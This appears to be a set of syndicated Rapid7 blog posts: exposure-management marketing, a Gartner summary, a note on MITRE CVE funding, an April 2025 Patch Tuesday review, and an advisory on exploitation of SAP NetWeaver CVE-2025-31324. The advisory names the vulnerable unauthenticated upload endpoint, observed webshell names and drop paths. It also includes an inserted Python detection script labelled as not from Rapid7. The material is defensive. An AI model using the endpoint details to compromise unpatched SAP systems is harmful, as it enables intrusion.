We live in a world where traditional Vulnerability Management (VM) has become infosec’s version of ‘whack-a-mole’: an attempt to tackle risks that constantly shift, multiply, and morph. As organizations push workloads to the cloud, offer customers digital experiences, or build AI-enabled applications across their business, the attack surface expands exponentially. For decades, security teams have relied on traditional network and endpoint-based scanners to discover and patch CVEs, but the reality is that attackers don’t think in terms of “CVEs”; they think in attack paths.

The most successful hackers increase the blast radius and impact of their attacks by connecting key dots across your organization:

  • Weak access controls to high-privilege users.
  • Misconfigurations to mission-critical assets.
  • Known exploits to the number of impacted systems.

To tame this complicated, quickly-evolving threat landscape, security teams are moving from ticking boxes for vulnerabilities patched, to understanding, contextualizing, and preempting real-world threats before they become breaches. The strategic shift has fueled the rise of Risk-Based Vulnerability Management (RBVM) and Continuous Threat Exposure Management (CTEM).

However, many organizations implement these approaches through an array of point security solutions – vulnerability scanners, endpoint detection software, penetration testing – and feed this data into one or more aggregation tools (usually SIEMs). This fragmented approach has inadvertently paved the way for tool sprawl, operational silos, and security blind spots. In this blog, I’ll explore why RBVM and CTEM have become essential security strategies, common mistakes that organizations make in implementation, and why these shortcomings have fueled the demand for unified exposure management.

RBVM helps teams prioritize remediation based on exploitability, criticality, and threat intelligence, rather than relying solely on CVE severity scores. RBVM solutions typically ingest data from vulnerability scanners, external threat feeds, endpoint detection systems, and other security tools. Security analysts then correlate key findings against SIEM tools to determine which vulnerabilities are actively being exploited in their environment.

The key benefit? This approach reduces alert noise because it filters out low-risk vulnerabilities, enabling security teams to focus remediation efforts on the most critical threats.

However, RBVM approaches come with significant drawbacks:

  • RBVM tools are not designed to perform scans or produce threat intel themselves.
  • Teams must integrate RBVM solutions into their existing security stack (SIEM, SOAR, EDR, cloud security tools) – a process that’s often complex, time-consuming, and costly.
  • Most critically, if there are assets that the RBVM services have no visibility into, they will not produce risk scores for them, creating an incomplete picture of your attack surface and an inaccurate representation of true business threats.

The evolution to CTEM

To continuously assess and validate exposures across the entire attack surface, organizations are turning to CTEM as a proactive strategy for mitigating ongoing risk. With real-time, continuous visibility into the attack surface and attack paths, security teams can prioritize remediation efforts based on the risks that impact business-critical systems. Despite the benefits of this more advanced approach, implementing CTEM with fragmented security tools creates significant challenges:

Misleading view of the attack surface.

Your security stack may have top-tier vulnerability scanners, EDR solutions, and CSPM tools, but if these tools aren’t talking to each other, you end up with an incomplete view of the attack paths that hackers would take. Leading CTEM approaches are underpinned by platforms that go beyond CVEs by incorporating misconfigurations, cloud entitlements, shadow IT, lateral movement risks, and application security gaps to provide a comprehensive view of the attack surface.

Lacking business context and impact analysis for prioritization.

Security teams have to sort through alerts, false positives, and vulnerability scan results that often lack business context. Without a unified platform connecting vulnerability findings with risk scores and business impact, teams will struggle to accurately prioritize risk, leaving them spending valuable time remediating issues that do not actually impact business-critical systems. Organizations need to look across the entire attack surface, including internal and external-facing attack vectors, as well as telemetry signals like weak identity and access controls.

Silos hinder incident response.

Vulnerability dashboards and reports do not depict how an adversary would exploit a vulnerability. Organizations need an in-depth view of the attack path to understand, for example, how misconfigurations can result in disruptive domain compromise in the event of a breach. This insight helps security teams identify interconnected systems and organizational peers (e.g., application owners, cloud architects, developers, engineers, etc.) that they will need to coordinate with in case there is a breach.

The driving force for a unified exposure management platform

According to the 2023 Gartner® Technology Adoption Roadmap for Large Enterprises Survey, cybersecurity leaders indicated that on average their organizations had 43 tools in their cybersecurity product portfolios, and 5% of the leaders indicated their organizations had over 100 tools. We believe that managing that many tools can be overwhelming, especially because security teams often operate their tools in silos. The ensuing sprawl creates blind spots that attackers can easily exploit. Instead of juggling multiple disconnected tools, forward-thinking organizations are embracing a unified approach to exposure management with comprehensive platforms that deliver:

  • Vulnerability management
  • CASM
  • EASM
  • Cloud security
  • Identity security
  • Threat intelligence

Because many high-profile breaches start with compromised credentials or excessive privileges, the ideal exposure management platform maps critical assets against users with weak authentication protocols.

Security teams can no longer rely on a scan-and-patch approach; they need to stay ahead of attackers by continuously identifying, validating, and mitigating risks across the entire attack surface. If your security tools aren’t fully integrated, attackers will exploit what’s left exposed. CISOs, security architects, and SOC leaders are tackling this challenge by moving beyond traditional VM and adopting a unified exposure management strategy with Rapid7’s Exposure Command Platform.

Connecting the dots with Exposure Command

Unlike traditional standalone VM, CASM, EASM, SIEM, or EDR tools that rely on proprietary agents, Exposure Command from Rapid7 brings it all together into one platform. With an inside-out and outside-in view of your risks, combined with trusted threat intelligence and a vendor agnostic approach to vulnerability aggregation, security teams gain a complete, end-to-end view of their attack surface.

Rapid7’s all-in-one Exposure Command platform goes even further by automatically mapping users, authentication protocols, and the criticality of the systems they can access. Armed with deep visibility into vulnerabilities and their impact to the business, organizations can leverage Rapid7’s Remediation Hub to address the risks that have the largest impact on their overall risk posture.

The paradigm has shifted – it’s no longer about chasing vulnerability patches, but about taking command and reducing risk across the business.

Ready to see the difference a unified approach can make? Check out the Rapid7 Exposure Command product trial to learn more about our platform and dive deeper into our unified, modern approach to managing risk and remediating security threats.

Gartner, Infrastructure Security Primer for 2025, John Watts, Franz Hinner, 29 January 2025 (For Gartner subscribers only)

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

Three Takeaways from the Gartner® Report: How to Grow Vulnerability Management Into Exposure Management

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/04/30/three-takeaways-from-the-gartner-r-report-how-to-grow-vulnerability-management-into-exposure-management/

Security leaders today face a harsh reality: traditional vulnerability management isn’t enough. Threat actors are evolving, attack surfaces are expanding, and organizations need a more proactive approach to stay ahead of risk. Latest research from Gartner, How to Grow Vulnerability Management Into Exposure Management, highlights the need for security teams to move beyond simply tracking vulnerabilities and embrace a more comprehensive approach to exposure management.

At Rapid7, we are excited to offer complimentary access to this report and share our three key takeaways to help you modernize your security strategy.

Takeaway 1: Vulnerability Lists Aren’t Enough—You Need Continuous Threat Exposure Management (CTEM)

Gartner states: “Creating prioritized lists of security vulnerabilities isn’t enough to cover all exposures or find actionable solutions. Security operations managers should go beyond vulnerability management and build a continuous threat exposure management program to more effectively scope and remediate exposures.”

CTEM shifts the focus from merely identifying vulnerabilities to understanding the full picture of organizational risk. It integrates asset visibility, business impact analysis, attack surface monitoring, and validation of security controls to help organizations assess and reduce their true exposure to threats.

Takeaway 2: Exposure Management Requires Business Context

One of the biggest challenges in vulnerability management today is that many security teams focus too much on discovering issues without evaluating their impact on the business. Gartner highlights the importance of integrating business context into security operations, stating that “adding a business context, such as asset value and impact of compromise, to exposure management activities can improve senior leadership engagement.”

By aligning security initiatives with business priorities, organizations can:

  • Focus on the vulnerabilities that pose the greatest risk to critical operations
  • Improve communication with senior leadership and stakeholders
  • Justify security investments with real business impact

Takeaway 3: Attack Surface Visibility Must Keep Up With Digital Evolution

Modern attack surfaces extend far beyond on-premises IT. The rise of cloud applications, IoT, supply chain dependencies, and remote work environments has dramatically increased the number of potential entry points for attackers. Gartner emphasizes that “current approaches to attack surface visibility are not keeping up with the rapid pace of digital evolution. Organizations must quickly reduce exposure to make their public-facing assets less visible and accessible.”

This means security teams need to enhance their discovery processes to:

  • Continuously monitor both their internal and external attack surface
  • Identify misconfigurations, exposed assets, emerging threats, and weak access controls (e.g., credentials, risky users)
  • Implement proactive security measures to reduce overall exposure

How Rapid7 Aligns with Gartner Exposure Management Vision

At Rapid7, we believe in empowering security teams with the tools and insights they need to shift from reactive vulnerability management to proactive exposure management. Our Exposure Management solution helps organizations:

  • Gain real-time visibility into evolving attack surfaces
  • Prioritize threats based on business impact and exploitability
  • Continuously validate security controls through adversarial exposure testing

As threats continue to evolve, organizations must rethink how they approach vulnerability management. Gartner research provides a roadmap for security leaders looking to implement a comprehensive exposure management strategy.

Download the full Gartner report today to learn how you can modernize your security program and stay ahead of threats.

Gartner, How to Grow Vulnerability Management Into Exposure Management, Michell Schneider, Jeremy D’Hoinne, Jonathan Nunez, Craig Lawson, 8 November 2024

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

Active exploitation of SAP NetWeaver Visual Composer CVE-2025-31324

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/

On Thursday, April 24, enterprise resource planning company SAP published a CVE (and a day later, an advisory behind login) for CVE-2025-31324, a zero-day vulnerability in NetWeaver Visual Composer that carries a CVSSv3 score of 10. The vulnerability arises from a missing authorization check in Visual Composer’s Metadata Uploader component that, when successfully exploited, allows unauthenticated attackers to send specially crafted POST requests to the /developmentserver/metadatauploader endpoint, resulting in unrestricted malicious file upload.

While the vulnerable component is not installed in NetWeaver’s default configuration, SAP security firm Onapsis notes that it is widely enabled.

Per SAP’s docs, Visual Composer “operates on top of the SAP NetWeaver Portal, utilizing the portal’s connector-framework interfaces to enable access to a range of data services, including SAP and third-party enterprise systems. In addition to accessing SAP Business Suite systems, users can access SAP NetWeaver Business Warehouse and any open/JDBC stored procedures.”

Rapid7-observed exploitation

CVE-2025-31324 is being actively exploited in the wild; Rapid7 MDR has observed exploitation in multiple customer environments dating back to at least March 27, 2025, nearly all of which has targeted manufacturing companies. Adversaries have exploited the vulnerability to drop webshells in the following directory: j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/

Public threat intelligence on CVE-2025-31324 exploitation has highlighted the use of webshells named helper.jsp and cache.jsp. With few exceptions (like helper.jsp), most webshells Rapid7 has observed had random 8-character names, e.g.:

  • cglswdjp.jsp
  • ijoatvey.jsp
  • dkqgcoxe.jsp
  • ylgxcsem.jsp
  • cpyjljgo.jsp
  • tgmzqnty.jsp

Rapid7 has not attributed this activity to a specific threat actor at time of writing.

Mitigation guidance

All SAP NetWeaver 7.xx versions and service packs (SPS) are affected.

SAP’s non-public guidance indicates that customers can check system info (http://host:port/nwa/sysinfo) for the Software Component VISUAL COMPOSER FRAMEWORK (VCFRAMEWORK.SCA). If this check returns no results, SAP has said the vulnerability is “not relevant for that system.”

Customers should update to the latest version of NetWeaver AS on an emergency basis, without waiting for a regular patch cycle to occur. Note that updating to a fixed version of NetWeaver will not address pre-existing compromises. Customers who are unable to update to a fixed version of the application should disable Visual Composer by following SAP’s directions here.

Customers should also restrict access to the affected endpoint (/developmentserver/metadatauploader) and investigate their environments for signs of compromise. SAP’s non-public advisory notes that the “most common targets for an attacking agent” are the following paths under the JAVA server file system; jsp, java, or class files present directly in these paths should be considered malicious:

  • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
  • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
  • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync
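As an added example (not code from Rapid7 or SAP), the Python below turns the indicators above into a hunt: it flags POST requests to /developmentserver/metadatauploader in web server logs and treats any .jsp/.java/.class file sitting directly in the three irj directories as malicious, labelling names that match the two public webshell names or the eight-lowercase-letter pattern of the observed random names (the lowercase-only pattern is inferred from the samples listed above). The log lines and directory listing are constructed; scan_irj_dirs reads real directories when given an instance root.

```python
"""Hunting for CVE-2025-31324 artifacts.

Added example; not code from the Rapid7 post or from SAP.  It encodes the
post's indicators: POST requests to /developmentserver/metadatauploader in
web server logs, and .jsp/.java/.class files directly inside the three irj
directories the advisory names.  File names are additionally labelled when
they match the two public names (helper.jsp, cache.jsp) or the eight-
lowercase-letter shape of the observed random names; lowercase-only is an
inference from the listed samples.  SAMPLE_LISTING and SAMPLE_ACCESS_LOG
are constructed data.
"""
import os
import re

KNOWN_WEBSHELLS = {"helper.jsp", "cache.jsp"}
RANDOM_NAME = re.compile(r"^[a-z]{8}\.jsp$")
SERVLET_EXTENSIONS = (".jsp", ".java", ".class")
UPLOADER_POST = re.compile(r'"POST\s+/developmentserver/metadatauploader(?:[?\s]|$)')

# Relative to C:\usr\sap\<SID>\<InstanceID>, per the paths quoted in the post.
IRJ_SUBDIRS = tuple(
    os.path.join("j2ee", "cluster", "apps", "sap.com", "irj", "servlet_jsp", "irj", *tail)
    for tail in (("root",), ("work",), ("work", "sync"))
)

# Constructed sample data (not real captures).
SAMPLE_LISTING = ["index.html", "helper.jsp", "cglswdjp.jsp", "Exploit.class", "notes.txt", "Cache.JSP"]
SAMPLE_ACCESS_LOG = [
    '10.1.2.3 - - [26/Apr/2025:03:15:00 +0000] "GET /irj/portal HTTP/1.1" 200 9182',
    '198.51.100.23 - - [26/Apr/2025:03:14:07 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 641',
    '10.1.2.4 - - [26/Apr/2025:03:16:31 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 405 0',
]


def classify(filename):
    """Returns a verdict label for a file found directly in an irj directory, or None."""
    lower = filename.lower()
    if not lower.endswith(SERVLET_EXTENSIONS):
        return None
    if lower in KNOWN_WEBSHELLS:
        return "known_webshell_name"
    if RANDOM_NAME.match(filename):
        return "random_8char_jsp"
    return "servlet_source_in_irj_dir"   # still malicious per the advisory, just unnamed


def triage_listing(filenames):
    """Maps every flagged filename to its verdict; clean files are omitted."""
    verdicts = {}
    for name in filenames:
        verdict = classify(name)
        if verdict:
            verdicts[name] = verdict
    return verdicts


def scan_irj_dirs(instance_root):
    """Non-recursive scan of the three advisory paths under a real instance root."""
    report = {}
    for sub in IRJ_SUBDIRS:
        directory = os.path.join(instance_root, sub)
        if not os.path.isdir(directory):
            continue
        files = [f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f))]
        hits = triage_listing(files)
        if hits:
            report[directory] = hits
    return report


def uploader_posts(log_lines):
    """Access-log lines showing a POST to the vulnerable Metadata Uploader endpoint."""
    return [line for line in log_lines if UPLOADER_POST.search(line)]


if __name__ == "__main__":
    for name, verdict in triage_listing(SAMPLE_LISTING).items():
        print("%-16s %s" % (name, verdict))
    for line in uploader_posts(SAMPLE_ACCESS_LOG):
        print("uploader POST:", line)
```

Because the endpoint is unauthenticated, any POST to it from an address that is not a known developer workstation is worth a ticket on its own; pairing that hit with a new file in the irj directories within a few seconds is the pattern that distinguishes a successful drop from a scan.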

For additional information and the latest guidance, please refer to SAP’s non-public materials or contact SAP support.

Rapid7 customers

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage.

For InsightVM and Nexpose customers, our vulnerability coverage engineering team is investigating options to help customers assess exposure to this threat. We will update this blog no later than 3 PM ET on Monday, April 28 with additional information and delivery timelines.

Following the News: MITRE’s Common Vulnerabilities and Exposures (CVE) Funding

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/04/16/following-the-news-mitres-common-vulnerabilities-and-exposures-cve-funding/

The current situation

On April 16, CISA extended funding to ensure no continuity issues with the critical Common Vulnerabilities and Exposures (CVE) program. This was in response to a letter sent by MITRE on April 15 to CVE board members warning of a potential issue with MITRE’s support for the CVE program. MITRE administers the global CVE program, which provides the human and technological infrastructure to reserve, publish, modify, and dispute CVEs.

Rapid7 continues to monitor both public and private discussions closely in its capacity as a CVE Numbering Authority (CNA) and as a longtime leader and participant in the CVE ecosystem.

How this could impact Rapid7 and our customers

Since funding has been extended for the next 11 months, there is no current impact. Rapid7 will continue to monitor the situation to ensure there is no future impact to our customers’ ability to use our platform to accurately assess their environment for vulnerabilities.

Rapid7’s multi-layered approach to vulnerability detection, creation, and risk scoring means that our products are not completely reliant on any single source of information. This was something we pointed to last year, when we assured customers of our continued vulnerability coverage in the face of NIST’s National Vulnerability Database delays.

The importance of MITRE and the CVE Program

The CVE program is critical infrastructure for modern vulnerability identification, tracking, management, and resolution. CVEs are used for risk identification, commercial and open-source tooling, vulnerability management workflows, security and academic research, threat intel production, incident response, and many other applications worldwide.

Rapid7 thanks and supports the MITRE organization as well as the extended ecosystem of industry collaborators who have worked diligently for the past 25 years to ensure the CVE program’s utility and integrity for the broader community.

We will continue to monitor the situation and will update this blog with any relevant developments. If you have any questions, please reach out.

Patch Tuesday – April 2025

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/04/08/patch-tuesday-april-2025/

Microsoft is addressing 121 vulnerabilities this April 2025 Patch Tuesday, which is more than twice as many as last month. Microsoft has evidence of in-the-wild exploitation for just one of the vulnerabilities published today, which is already reflected in CISA KEV. Once again, Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication, so that’s now a seven month unbroken streak. Today also sees the publication of 11 critical remote code execution (RCE) vulnerabilities. 13 browser vulnerabilities have already been published separately this month, and are not included in the total.

CLFS: zero-day EoP

The Windows Common Log File System (CLFS) Driver is firmly back on our radar today with CVE-2025-29824, a zero-day local elevation of privilege vulnerability. First, the good news: the Acknowledgements section credits the Microsoft Threat Intelligence Center, so the exploit was successfully reproduced by Microsoft; the less-good news is that someone other than Microsoft was first to discover the exploit, because otherwise Microsoft wouldn’t be listing CVE-2025-29824 as exploited in the wild. The advisory does not specify what privilege level is achieved upon successful exploitation, but it’ll be SYSTEM, because that’s the prize for all the other CLFS elevation of privilege zero-day vulnerabilities. As usual, some form of less-privileged local access is a pre-requisite, but attack complexity is low, so this is the sort of vulnerability which goes into any standard break-and-enter toolkit. Given the long history of similar vulnerabilities, it would be more surprising if exploit code wasn’t publicly available in the not-too-distant future. Although December 2024 Patch Tuesday seems as though it must have been a very long time ago, any standard calendar will tell us that only 119 days have elapsed since the last zero-day CLFS local elevation of privilege. Rapid7 discussed the history of CLFS zero-day elevation of privilege vulnerabilities at the time. All versions of Windows receive a patch, except for the venerable LTSC Windows 10 1507, which is listed on the advisory as vulnerable, but left out in the cold with no update; the FAQ says to check back later. Windows 10 LTSC 1507 is scheduled for end of servicing on 2025-10-14, so the clock is ticking regardless.

LDAP Server: critical RCE

Although it has been many months since we’ve seen a critical zero-day vulnerability from Microsoft, there is no shortage of critical remote code execution (RCE) vulnerabilities published today. Defenders responsible for an LDAP server — which means almost any organization with a non-trivial Microsoft footprint — should add patching for CVE-2025-26663 to their to-do list. With no privileges required, no need for user interaction, and code execution presumably in the context of the LDAP server itself, successful exploitation would be an attractive shortcut to any attacker. Anyone wondering if today is a re-run of December 2024 Patch Tuesday can take some small solace in the fact that the worst of the trio of LDAP critical RCEs published at the end of last year was likely easier to exploit than today’s example, since today’s CVE-2025-26663 requires that an attacker win a race condition. Despite that, Microsoft still expects that exploitation is more likely.

LDAP Client: critical RCE

If you breathe a sigh of relief when you see LDAP server critical RCE vulnerabilities like CVE-2025-26663, because you’re certain that you don’t have any Windows LDAP servers in your estate, how about LDAP clients? CVE-2025-26670 describes a critical RCE in the LDAP client, although the FAQ confusingly states that exploitation would require an attacker to “send specially crafted requests to a vulnerable LDAP server”; this seems like it might be a data entry error on the advisory FAQ, so keep an eye out for an update to that section of the advisory. Assuming the rest of the advisory is all present and correct, exploitation requires that the attacker win a race condition, which keeps the attack complexity higher than it otherwise would be. While we wait for clarification, it’s still a critical RCE which Microsoft rates as “exploitation more likely”. On that basis, patching is always recommended.

RDS: critical RCEs

The prolific Windows vulnerability pioneers at Kunlun Lab are credited with a pair of critical RCE vulnerabilities in Windows Remote Desktop Services. Although both CVE-2025-27480 and CVE-2025-27482 share a CVSSv3 base score of 8.1, Microsoft has ranked them both as critical using its own proprietary severity ranking scale. Both vulnerabilities require that an attacker win a race condition. If you’ve ever read Microsoft’s guide to deploying the Remote Desktop Gateway role, you probably have some systems to patch.

Hyper-V: critical RCE

Some Microsoft security advisory FAQs provide a satisfying level of detail, whereas others raise more questions than they answer. CVE-2025-27491 is a Hyper-V critical RCE which falls into the second category, since it states that an attacker must be authenticated — no need for elevated privileges — but also that the attacker must send the user a malicious site and convince them to open it, and it’s not at all clear why authentication would be required in that case. Also unusual: the remediation table on the advisory lists several 32-bit versions of Windows as receiving patches, although Hyper-V requires a 64-bit processor and a 64-bit host OS.

Microsoft lifecycle update

In Microsoft product lifecycle news, Dynamics GP 2015 moves past the end of extended support today. The next batch of significant lifecycle status changes is due in July 2025, when the SQL Server 2012 ESU program draws to a close.

Summary charts

[Summary chart images for Patch Tuesday - April 2025; one captioned “Elevated amounts of elevation of privilege”]

Summary tables

Apps vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-29805 Outlook for Android Information Disclosure Vulnerability No No 7.5

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-27489 Azure Local Elevation of Privilege Vulnerability No No 7.8
CVE-2025-26628 Azure Local Cluster Information Disclosure Vulnerability No No 7.3
CVE-2025-25002 Azure Local Cluster Information Disclosure Vulnerability No No 6.8

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-25000 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability No No 8.8
CVE-2025-29815 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability No No 7.6
CVE-2025-29796 Microsoft Edge for iOS Spoofing Vulnerability No No 4.7
CVE-2025-25001 Microsoft Edge for iOS Spoofing Vulnerability No No 4.3
CVE-2025-3074 Chromium: CVE-2025-3074 Inappropriate implementation in Downloads No No N/A
CVE-2025-3073 Chromium: CVE-2025-3073 Inappropriate implementation in Autofill No No N/A
CVE-2025-3072 Chromium: CVE-2025-3072 Inappropriate implementation in Custom Tabs No No N/A
CVE-2025-3071 Chromium: CVE-2025-3071 Inappropriate implementation in Navigations No No N/A
CVE-2025-3070 Chromium: CVE-2025-3070 Insufficient validation of untrusted input in Extensions No No N/A
CVE-2025-3069 Chromium: CVE-2025-3069 Inappropriate implementation in Extensions No No N/A
CVE-2025-3068 Chromium: CVE-2025-3068 Inappropriate implementation in Intents No No N/A
CVE-2025-3067 Chromium: CVE-2025-3067 Inappropriate implementation in Custom Tabs No No N/A
CVE-2025-3066 Chromium: CVE-2025-3066 Use after free in Navigations No No N/A

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-26682 ASP.NET Core and Visual Studio Denial of Service Vulnerability No No 7.5
CVE-2025-29802 Visual Studio Elevation of Privilege Vulnerability No No 7.3
CVE-2025-29804 Visual Studio Elevation of Privilege Vulnerability No No 7.3
CVE-2025-20570 Visual Studio Code Elevation of Privilege Vulnerability No No 6.8

Developer Tools SQL Server vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-29803 Visual Studio Tools for Applications and SQL Server Management Studio Elevation of Privilege Vulnerability No No 7.3

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-29821 Microsoft Dynamics Business Central Information Disclosure Vulnerability No No 5.5

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-29794 Microsoft SharePoint Remote Code Execution Vulnerability No No 8.8
CVE-2025-27747 Microsoft Word Remote Code Execution Vulnerability No No 7.8
CVE-2025-29820 Microsoft Word Remote Code Execution Vulnerability No No 7.8
CVE-2025-29822 Microsoft OneNote Security Feature Bypass Vulnerability No No 7.8
CVE-2025-27745 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-27748 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-27749 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-27746 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-26642 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-27744 Microsoft Office Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27752 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-29791 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-27751 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-27750 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-29823 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-29800 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability No No 7.8
CVE-2025-29801 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability No No 7.8
CVE-2025-29816 Microsoft Word Security Feature Bypass Vulnerability No No 7.5
CVE-2025-29792 Microsoft Office Elevation of Privilege Vulnerability No No 7.3
CVE-2025-29793 Microsoft SharePoint Remote Code Execution Vulnerability No No 7.2

System Center vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-27743 Microsoft System Center Elevation of Privilege Vulnerability No No 7.8

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-26678 Windows Defender Application Control Security Feature Bypass Vulnerability No No 8.4
CVE-2025-27482 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2025-26639 Windows USB Print Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2025-26675 Windows Subsystem for Linux Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27729 Windows Shell Remote Code Execution Vulnerability No No 7.8
CVE-2025-29811 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2025-26666 Windows Media Remote Code Execution Vulnerability No No 7.8
CVE-2025-26674 Windows Media Remote Code Execution Vulnerability No No 7.8
CVE-2025-27728 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27739 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27476 Windows Digital Media Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27467 Windows Digital Media Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27730 Windows Digital Media Elevation of Privilege Vulnerability No No 7.8
CVE-2025-24058 Windows DWM Core Library Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27490 Windows Bluetooth Service Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27731 Microsoft OpenSSH for Windows Elevation of Privilege Vulnerability No No 7.8
CVE-2025-24074 Microsoft DWM Core Library Elevation of Privilege Vulnerability No No 7.8
CVE-2025-24073 Microsoft DWM Core Library Elevation of Privilege Vulnerability No No 7.8
CVE-2025-24060 Microsoft DWM Core Library Elevation of Privilege Vulnerability No No 7.8
CVE-2025-24062 Microsoft DWM Core Library Elevation of Privilege Vulnerability No No 7.8
CVE-2025-29812 DirectX Graphics Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2025-29809 Windows Kerberos Security Feature Bypass Vulnerability No No 7.1
CVE-2025-27491 Windows Hyper-V Remote Code Execution Vulnerability No No 7.1
CVE-2025-27475 Windows Update Stack Elevation of Privilege Vulnerability No No 7
CVE-2025-26649 Windows Secure Channel Elevation of Privilege Vulnerability No No 7
CVE-2025-27492 Windows Secure Channel Elevation of Privilege Vulnerability No No 7
CVE-2025-26640 Windows Digital Media Elevation of Privilege Vulnerability No No 7
CVE-2025-26681 Win32k Elevation of Privilege Vulnerability No No 6.7
CVE-2025-26651 Windows Local Session Manager (LSM) Denial of Service Vulnerability No No 6.5
CVE-2025-26635 Windows Hello Security Feature Bypass Vulnerability No No 6.5
CVE-2025-27735 Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability No No 6
CVE-2025-27736 Windows Power Dependency Coordinator Information Disclosure Vulnerability No No 5.5
CVE-2025-29808 Windows Cryptographic Services Information Disclosure Vulnerability No No 5.5
CVE-2025-26644 Windows Hello Spoofing Vulnerability No No 5.1

Windows Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-29819 Windows Admin Center in Azure Portal Information Disclosure Vulnerability No No 6.2

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-27477 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21205 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21221 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21222 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-27481 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-26669 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability No No 8.8
CVE-2025-27740 Active Directory Certificate Services Elevation of Privilege Vulnerability No No 8.8
CVE-2025-27737 Windows Security Zone Mapping Security Feature Bypass Vulnerability No No 8.6
CVE-2025-27480 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2025-26671 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2025-26663 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability No No 8.1
CVE-2025-26647 Windows Kerberos Elevation of Privilege Vulnerability No No 8.1
CVE-2025-26670 Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability No No 8.1
CVE-2025-27487 Remote Desktop Client Remote Code Execution Vulnerability No No 8
CVE-2025-21204 Windows Process Activation Elevation of Privilege Vulnerability No No 7.8
CVE-2025-26648 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27727 Windows Installer Elevation of Privilege Vulnerability No No 7.8
CVE-2025-29824 Windows Common Log File System Driver Elevation of Privilege Vulnerability Yes No 7.8
CVE-2025-26679 RPC Endpoint Mapper Service Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27741 NTFS Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27483 NTFS Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27733 NTFS Elevation of Privilege Vulnerability No No 7.8
CVE-2025-26688 Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability No No 7.8
CVE-2025-27484 Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability No No 7.5
